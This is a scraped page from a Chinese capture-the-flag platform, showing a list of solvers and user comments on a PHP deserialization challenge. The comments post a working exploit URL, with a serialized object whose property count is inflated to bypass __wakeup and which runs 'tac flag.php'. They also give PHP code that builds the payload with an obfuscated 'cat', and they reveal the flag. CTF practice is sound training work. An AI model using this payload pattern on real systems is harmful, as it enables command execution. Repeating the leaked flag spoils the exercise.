评分(3)
解题动态

sun_space 攻破了该题 2小时前

f13yf 攻破了该题 1天前

看writeup刷题 攻破了该题 4天前

288728 攻破了该题 4天前

songci1 攻破了该题 5天前

789123 攻破了该题 10天前

tingsi464 攻破了该题 11天前

雾島风起時 攻破了该题 11天前

forces 攻破了该题 11天前

liujiahaoctf 攻破了该题 13天前

卯壬在此 攻破了该题 13天前

33538626867 攻破了该题 14天前

nina123 攻破了该题 14天前

qgys 攻破了该题 17天前

19189756057 攻破了该题 18天前

Wsss12 攻破了该题 19天前

shangss 攻破了该题 19天前

ymkiras 攻破了该题 19天前

c2F1eQ 攻破了该题 21天前

评论
wxy1343 1年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 1年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 1年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 2年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 2年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~
YLMB001 2年前
举报
为什么我序列化后的protected属性是带有%20*%20而不是%00*%00
lysandria 2年前
举报
注意protect属性。
xiaoxiao972521 2年前
举报
认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430
SiiiirR0 2年前
举报
万能的dirsearch